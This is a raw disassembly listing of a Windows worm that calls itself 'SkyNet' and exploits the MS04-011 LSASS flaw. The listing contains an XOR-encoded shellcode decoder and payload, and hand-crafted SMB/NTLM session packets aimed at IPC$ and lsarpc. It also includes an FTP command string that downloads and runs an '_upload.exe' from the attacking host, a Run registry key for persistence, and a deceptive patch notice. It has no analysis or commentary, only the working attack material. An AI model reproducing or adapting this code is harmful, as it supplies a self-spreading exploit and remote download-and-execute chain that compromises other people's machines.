dd 5812h, 5858h, 5840h, 5832h, 5820h, 0
dd 7C80BE01h, 7C834E64h, 7C838AE7h, 7C835406h, 7C8365A5h
dd 7C802442h, 7C8353CEh, 7C85E830h, 7C80B4CFh, 7C810637h
dd 7C86136Dh, 7C80C108h, 7C8098EBh, 7C910331h, 7C80E93Fh
dd 7C80929Ch, 7C8286EEh, 7C821363h, 7C801D77h, 7C9179FDh
dd 7C809A51h, 7C9105D4h, 7C8127A7h, 7C809915h, 7C812E76h
dd 7C80A490h, 7C838A0Ch, 7C809BF8h, 7C810D87h, 7C937A40h
dd 7C91043Dh, 7C809AE4h, 7C812BB6h, 7C810EF8h, 7C810E51h
dd 7C812F39h, 7C80CC97h, 7C80CCA8h, 7C80ADA0h, 7C838DE8h
dd 7C812F08h, 7C81CF5Bh, 7C80A0D4h, 7C814AE7h, 7C80B6A1h
dd 7C801EEEh, 7C812F1Dh, 7C8111DAh, 7C81CDDAh, 7C801E16h
dd 7C80DDF5h, 7C862E2Ah, 7C81DF77h, 0
dd 7E41A8ADh, 7E45058Ah, 0
dd 57EAh, 0
dd 80000073h, 80000002h, 8000000Dh, 80000001h, 80000010h
dd 80000013h, 80000009h, 80000017h, 80000004h, 80000003h
dd 80000039h, 8000000Ch, 8000000Bh, 80000034h, 0
dd 588Ah, 589Ah, 5878h, 0
dd 654D0000h, 67617373h, 786F4265h, 41h, 72707377h, 66746E69h
dd 53550041h, 32335245h, 6C6C642Eh, 0
aGetprocaddress db 'GetProcAddress',0
align 4
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 736C0000h, 70637274h
dd 4179h, 6C5F0000h, 736F6C63h, 65h, 72776C5Fh, 657469h
dd 6C5F0000h, 6565736Ch, 6Bh, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 4
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65530000h, 72685474h, 50646165h, 726F6972h, 797469h
dd 65470000h, 72754374h, 746E6572h, 65726854h, 6461h, 65470000h
dd 73614C74h, 72724574h, 726Fh, 72430000h, 65746165h, 6574754Dh
dd 4178h, 65470000h, 63695474h, 756F436Bh, 746Eh, 6F430000h
dd 69467970h, 41656Ch, 65470000h, 6E695774h, 73776F64h
dd 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 53570000h, 32335F32h, 6C6C642Eh, 0
aInternetgetcon db 'InternetGetConnectedState',0
aWininet_dll db 'WININET.dll',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 6C654467h, 56657465h, 65756C61h, 41h, 4F676552h
dd 4B6E6570h, 417965h, 62410000h, 5374726Fh, 65747379h
dd 7568536Dh, 776F6474h, 416Eh, 65520000h, 74655367h, 756C6156h
dd 41784565h, 44410000h, 49504156h, 642E3233h, 6C6Ch, 63490000h
dd 6C43706Dh, 4865736Fh, 6C646E61h, 65h, 706D6349h, 646E6553h
dd 6F686345h, 0
aIcmpcreatefile db 'IcmpCreateFile',0
align 4
aIphlpapi_dll db 'iphlpapi.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 10h
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 4
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 10h
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 143h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset sub_403D5B
dword_406010 dd 0 dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40126C+AA�r
; "echo off&echo open %s 1023>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_401583+132�o
; sub_401583+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_405AF4+4EEh
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_401583+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_40137D+15D�o
; sub_401583+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+188�o
; sub_401583+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+1AD�o
; sub_401583+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+53�o
; sub_401583+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_40137D+85�o
; sub_401583+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401493+2 ; DATA XREF: sub_401583+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd offset word_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_401583+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
off_4068C8 dd offset dword_406924 ; DATA XREF: sub_40219B:loc_4021F3�r
; sub_40219B+B6�r
dd offset dword_406918
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B59+1A�r
; sub_401B59+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B59+77�r
; sub_401B59+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B59+A8�r
; sub_401B59+B5�r
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B59+2C6�r
; sub_401B59+2D3�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B59+184�r
; sub_401B59+191�r
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B59+1B9�r
; sub_401B59+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4Fhdword_406918 dd 5341534Ch, 56532053h, 52hdword_406924 dd 7361736Ch, 652E7373h, 6578haEchoOffEchoOpe db 'echo off&echo open %s 1023>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_upload.exe>>cmd.ftp&echo bye>>'
db 'cmd.ftp&echo on&ftp -s:cmd.ftp&%i_upload.exe&echo off&del cmd.ftp'
db '&echo on',0Ah,0
align 10h
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
asc_406A0C db 0Dh,0Ah,0 ; DATA XREF: sub_401210+40�o
align 10h
aCFtplog_txt db 'c:\ftplog.txt',0 ; DATA XREF: sub_401210+9�o
align 10h
aSC db '%s%c',0 ; DATA XREF: sub_40137D+1DF�o
align 4
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40137D+20�o
; sub_401583+23�o
align 4
dword_406A34 dd 6EB06EBh, 0 dword_406A3C dd 1CEC8166h dword_406A40 dd 0E4FF07h dword_406A44 dd 302E35h dword_406A48 dd 312E35h aQuit db 'QUIT',0 ; DATA XREF: sub_401B59+2E4�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_401B59+1A2�o
align 4
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B59+173�o
; sub_401F4B+79�o
word_406A68 dw 2Ch ; DATA XREF: sub_401B59+EE�r
align 4
aPort db 'PORT',0 ; DATA XREF: sub_401B59+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_401B59+95�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_401B59+64�o
align 4
asc_406A84: ; DATA XREF: sub_401F4B+157�o
unicode 0, < >,0
a1_YourComputer db '1. Your computer is affected by the MS04-011 vulnerability',0Dh,0Ah
; DATA XREF: sub_4020D9+B2�o
db '2. It can be that dangerous computer viruses similar',0Dh,0Ah
db ' the Blaster worm infect your computer',0Dh,0Ah
db '3. Please update your computer with the MS04-011 LSASS patch',0Dh,0Ah
db ' from the www.microsoft.com website',0Dh,0Ah
db '4. This is an message from the SkyNet Team for',0Dh,0Ah
db ' malicious activity prevention',0Dh,0Ah,0
align 4
aSkynet db 'SkyNet',0 ; DATA XREF: sub_4020D9+AD�o
align 4
aSkynetnotice db 'SkynetNotice',0 ; DATA XREF: sub_4020D9+3F�o
align 4
aDrvddll_exe db 'Drvddll_exe',0 ; DATA XREF: sub_40219B+EB�o
aDrvsys_exe db 'drvsys.exe',0 ; DATA XREF: sub_40219B+DF�o
align 4
aSsgrate_exe db 'ssgrate.exe',0 ; DATA XREF: sub_40219B+CE�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_40219B+8B�o
align 10h
asc_406C50: ; DATA XREF: sub_40219B+4B�o
unicode 0, <\>,0
align 10h
off_406C60 dd offset sub_402BEF ; DATA XREF: sub_402A24+1C�r
dword_406C64 dd 2 ; sub_4036B9+46�r
align 10h
off_406C70 dd offset word_406C7A ; DATA XREF: sub_402900+1E�r
; sub_402B3C+12�r ...
dd offset word_406C7A
db 2 dup(0)
word_406C7A dw 20h ; DATA XREF: sub_403966+18�r
; .text:off_406C70�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406E7C dd 1 dd 2Eh, 1
dword_406E88 dd 0C0000005h ; sub_402DF4+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406F00 dd 3 dword_406F04 dd 7 dword_406F08 dd 0Ah dword_406F0C dd 8Ch ; sub_402CB3+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406F1C dd 19930520h, 4 dup(0) ; sub_403586+2�o
dword_406F30 dd 2 ; sub_4036B9+28�r
off_406F34 dd offset aR6002FloatingP ; DATA XREF: sub_4036B9+FC�r
; sub_4036B9+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 405390h, 9, 405364h, 0Ah, 405340h, 10h, 405314h
dd 11h, 4052E4h, 12h, 4052C0h, 13h, 405294h, 18h, 40525Ch
dd 19h, 405234h, 1Ah, 4051FCh, 1Bh, 4051C4h, 1Ch, 40519Ch
dd 78h, 40518Ch, 79h, 40517Ch, 7Ah, 40516Ch, 0FCh, 406A0Ch
dd 0FFh, 40515Ch
byte_406FC0 db 1 ; DATA XREF: sub_4036B9+1B�o
; sub_403997+E1�r
db 2, 4, 8
align 8
dword_406FC8 dd 3A4h dword_406FCC dd 82798260h, 21h, 0dword_406FD8 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h
dword_40707C dd 0 ; .text:00406638�o ...
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_4070B8 dd 3F8h ; sub_403DE4+5�r
align 10h
dword_4070C0 dd 0 ; sub_401000+10�w ...
dword_4070C4 dd 0 dword_4070C8 dd 0 ; sub_40137D+C�o ...
dword_4070CC dd 0 ; sub_402770+91�w
dword_4070D0 dd 0 ; sub_402E8F:loc_402EA1�r ...
align 8
dword_4070D8 dd 0 dd 3 dup(0)
dword_4070E8 dd 0 dword_4070EC dd 0 dword_4070F0 dd 0 dword_4070F4 dd 0 dword_4070F8 dd 0 dword_4070FC dd 0 dd 0
dword_407104 dd 0 dd 3 dup(0)
dword_407114 dd 0 dd 0
byte_40711C db 0 ; DATA XREF: sub_402C00+2D�w
align 10h
dword_407120 dd 0 dword_407124 dd 0 ; sub_402C00+8B�w
dword_407128 dd 0 ; sub_402CB3+46�w ...
dword_40712C dd 41h dup(0) dword_407230 dd 0 ; sub_403195+23�w ...
dword_407234 dd 0 dword_407238 dd 0 ; sub_40380C:loc_403876�w
dword_40723C dd 0 ; sub_403B30+4�w ...
dword_407240 dd 0 ; resolved to->USER32.MessageBoxA ; sub_404663+2E�w ...
dword_407244 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_404663:loc_4046B2�r
dword_407248 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_404663+60�r
dd 2 dup(0)
dword_407254 dd 0 dd 3 dup(0)
dword_407264 dd 0 ; sub_403B30+3A�r ...
dd 0
dword_40726C dd 0 ; sub_4047EE+4C�w ...
dword_407270 dd 0 dword_407274 dd 0 dword_407278 dd 0 ; sub_4044B7+5�r ...
dword_40727C dd 0 ; sub_403E83+259�r ...
dword_407280 dd 0 ; sub_403E83+310�w ...
dword_407284 dd 0 ; sub_403E83+22C�r ...
dword_407288 dd 0 ; sub_403E58�r ...
dword_40728C dd 0 ; sub_403E58+8�r ...
dword_407290 dd 0 ; sub_403997+65�w ...
align 10h
dword_4072A0 dd 3 dup(0) ; sub_403997+171�o ...
dword_4072AC dd 0 ; sub_403997+15D�w ...
dd 4 dup(0)
byte_4072C0 db 0 ; DATA XREF: sub_403BD6:loc_403CE2�w
; sub_403BD6:loc_403CFF�w ...
align 4
dd 3Fh dup(0)
byte_4073C0 db 0 ; DATA XREF: sub_403997+5C�o
; sub_403997+AF�o ...
byte_4073C1 db 0 ; DATA XREF: sub_402FE1+3F�r
; sub_402FE1+84�r ...
align 4
dd 40h dup(0)
dword_4074C4 dd 0 ; sub_403997+12B�w ...
dword_4074C8 dd 0 ; sub_403472+29�r ...
dd 5 dup(0)
dword_4074E0 dd 0 ; sub_4032C7+45�r ...
dword_4074E4 dd 3Fh dup(0) dword_4075E0 dd 0 ; sub_4032C7:loc_403351�r ...
dword_4075E4 dd 0 dword_4075E8 dd 0 dword_4075EC dd 0 dword_4075F0 dd 0 ; sub_402C00+57�r
dword_4075F4 dd 0 dword_4075F8 dd 0 ; sub_402E37+F�r ...
align 1000h
_text ends
; Section 2. (virtual address 00008000)
; Virtual size : 00017000 ( 94208.)
; Section size in file : 00017000 ( 94208.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 408000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 7C801D77h, 7C80ADA0h, 7C809A51h, 7C809AE4h, 0
dd 8000h, 0
dd 0FFFFFFFFh, 803Ch, 8000h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 4C000000h, 4C64616Fh
dd 61726269h, 417972h, 47000000h, 72507465h, 6441636Fh
dd 73657264h, 73h, 72695600h, 6C617574h, 6F6C6C41h, 63h
dd 72695600h, 6C617574h, 65657246h, 2C8D0000h, 12B9CC65h
dd 0D2708F0h, 42D27649h, 7754046Ah, 84612950h, 0E1B60F25h
dd 42F8A4Dh, 0F48884EAh, 1C4B750Eh, 3D825013h, 48E1080Eh
dd 8B1C6001h, 3A7A2474h, 3C283C7Ch, 0FC2C0044h, 80B2DB33h
dd 74180039h, 2B3A442h, 3DC16DE8h, 0C933F673h, 94364E5h
dd 0CAC0CB1Ch, 8723115Bh, 10B04136h, 3F194FC6h, 0F701C012h
dd 0EBAA3F75h, 8F4DF9D4h, 99CB2B1Dh, 0EB10422Eh, 0D179AC28h
dd 134D740Fh, 911C20C9h, 7EE0C148h, 0CE2CFA08h, 7D0C3D2Dh
dd 801D0A7Dh, 64105FCh, 777FF883h, 95818CB8h, 1B3C58Bh
dd 2BF7D456h, 0A4F3F000h, 28EEB5Eh, 57503D2h, 1246168Ah
dd 0EA06C3BBh, 0FFEEE841h, 0D886DD02h, 0F2720FE7h, 0A22BC32Ah
dd 1C088960h, 0E010C261h, 54B9A648h, 702E0440h, 1901AD29h
dd 83040680h, 0F47DF809h, 0FDEBA077h, 0CC6AE07Fh, 0B02FBB18h
dd 341F5452h, 34440804h, 6048808Ah, 8589D08h, 21410BAh
dd 5450201Dh, 53F0CAADh, 1029100Ah, 0F5A9A04h, 0A7201016h
dd 53FA03Dh, 53884401h, 57525102h, 80E85556h, 0ED815D1Eh
dd 40116130h, 8025B58Dh, 0FC468B0Dh, 0A304C083h, 856C1D9h
dd 31C1687h, 89E18EC2h, 42128F8Dh, 0D912018h, 8C240C93h
dd 28239743h, 0DE8F9B10h, 854473E0h, 0E1874F6h, 3B52BB9h
dd 757BFCF2h, 25FA4840h, 0E28DE677h, 513FC29Fh, 0A1AF26E8h
dd 0BE2C4EC6h, 6AC484D8h, 98685240h, 6EC5128h, 858912FFh
dd 5608438Bh, 3103D7E8h, 804DF0Ch, 2A0242CBh, 34023362h
dd 840FC985h, 66558F89h, 202A5108h, 8500053Eh, 8B7B74C0h
dd 0C6176F95h, 0D738DEFh, 87544C6h, 136720D0h, 0F72DEB0Ch
dd 48057C1h, 81521E74h, 7F8990E1h, 85338D51h, 11503123h
dd 0A183C0Eh, 267D95FFh, 9BC1D14h, 6C80308h, 213F52D0h
dd 6A5112D1h, 0BB1E29E7h, 8AA66816h, 19187995h, 12C31001h
dd 0C4B44468h, 998BB52Bh, 9F7EDD06h, 15B3C79Ah, 5D0E000Ch
dd 595A5F5Eh, 4AE1C35Bh, 77A2CC01h, 4309D0BBh, 6D098132h
dd 1C507924h, 746E4507h, 5020C072h, 10DD696Fh, 8B34E9Dh
dd 0D475D346h, 6854C6C0h, 7F70FC65h, 0F7637672h, 0F914B6FBh
dd 18702452h, 63FE7325h, 646C46C7h, 625B99FFh, 4A6738BDh
dd 0FF4E9D61h, 0BCEF387Eh, 7F79BC6Bh, 636C6D7Ch, 0C76B202Eh
dd 0ED72620Bh, 2E689575h, 316F3F52h, 6C612E64h, 44D620BBh
dd 6EF25BE8h, 8CE05DF2h, 0A398BAA9h, 7540E209h, 7726573h
dd 642E3233h, 4D0F1E6Ch, 619F3E5Fh, 6F42C367h, 77834178h
dd 0B5C511DDh
; ---------------------------------------------------------------------------
loc_408350: ; CODE XREF: .rsrc:00408378�j
xor esp, [esi+14h]
imul edi, [eax+40h], -1Ah
insb
cmpsb
and eax, ds:74697845h
push eax
ficom word ptr es:[eax-51h]
movsd
dec edx
; ---------------------------------------------------------------------------
db 80h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
in al, dx
push ebx
cwde
cmpsd
push eax
call near ptr 8159DE87h
jmp short loc_408350
; ---------------------------------------------------------------------------
cmp eax, 0CCE3218Bh
push cs
add ecx, [ecx]
retf
; ---------------------------------------------------------------------------
db 51h
dd 969293FFh, 893A0248h, 4EFC4526h, 0D3030404h, 0F4FB7F88h
dd 1A27C602h, 0C3F60E52h, 7537C690h, 0C0184CFCh, 835AAB14h
dd 0EB04C20Eh, 0CC6A1E0h, 208B068Bh, 168FBB75h, 0FFB805A3h
dd 5BA90350h, 36C95D34h, 7DE56F2Dh, 447C68Fh, 3BC15FEEh
dd 0F44474C3h, 0CF9A3877h, 0F3033D1Eh, 0D82BD340h, 78FC5D89h
dd 0DAF1EDADh, 2AA53CD7h, 0E983C884h, 9373C708h, 281666EDh
dd 0EF0981F8h, 0FB9BA70Fh, 0CE8C1C1h, 0CD26E3D2h, 818B11C2h
dd 49070197h, 0EBE1C8C7h, 0A063A5CCh, 960EDF60h, 0A9792808h
dd 0DC201441h, 0AA45843Ch, 3E837634h, 0B70548C3h, 0C9A90C43h
dd 0DE9861E8h, 6FEED1C4h, 7E0072FDh, 7EEB6802h, 0C4338B51h
dd 53082E55h, 0C07E3D6Ah, 3B0E5B50h, 4D507DCFh, 0ECA13CD2h
dd 25A17012h, 0A057433h, 5C86D615h, 0C139A9C6h, 3CE4EB8Bh
dd 410ECD87h, 302975E9h, 571E0192h, 1807F838h, 177D08EBh
dd 0EE9D8E9h, 60CEA757h, 0C48610C0h, 0CC89F22Bh, 5625F24h
dd 0B3EB9983h, 0AFD041EDh, 3259785Bh, 3B505118h, 0BE01B7C3h
dd 0EC830E4Bh, 2A746602h, 8E1654E8h, 9C59505Fh, 0C8496210h
dd 37495CE9h, 24D54F5Dh, 669D9560h, 7CC94DD4h, 8B1A0C48h
dd 0C00F8F07h, 0F4EB0889h, 0C3EC961h, 0A7FAB6h, 0C131544h
dd 8B0D915Fh, 70B767B9h, 0C1629B8Bh, 17270448h, 1C4CC23h
dd 10420E26h, 0A4E94008h, 0F21D13A8h, 0BD163303h, 384B8533h
